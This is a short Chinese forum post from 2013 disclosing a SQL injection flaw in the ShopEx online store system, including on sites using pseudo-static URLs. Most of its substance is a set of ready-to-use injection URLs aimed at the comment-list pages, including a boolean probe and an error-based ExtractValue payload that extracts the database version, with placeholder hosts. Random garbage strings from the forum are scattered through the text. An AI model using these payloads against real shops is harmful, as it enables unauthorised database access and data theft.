注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
/ f }& S! w% B! c$ d. Y7 p
2 `7 l ~) ~& D+ R2 s/ k( L# ~! p好吧,我扯远了~~+ Q1 |! a! m5 p0 O8 K( K" _" W# a
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
" k3 _. u: W! T* z4 L" G不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 d4 f7 E( |0 ]' F$ U5 W4 e/ L3 I: K3 g
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html# z Q! i3 v* u l2 N8 @2 T
( C( o) _& \9 g0 Lhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html" k0 U; C8 R3 k- z
+ m, k9 o9 z. W% b0 ?2 m
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html) c( j) ]6 F7 _/ v4 I
0 D5 Z, l& Y8 Q7 ~http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
! M' H( T! }( C7 K5 D* s' ~5 d
4 B+ O# A9 \( o& H) y* G
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
9 ` y) Z H) ]如何注入就不多说了,10多年的东西了…不会也会了…
8 X( J3 w3 }8 V, p W+ ?
) o( B! M: e, H: J8 N2 |+ O |
发表于 2013-2-4 16:20:04
收藏
支持
反对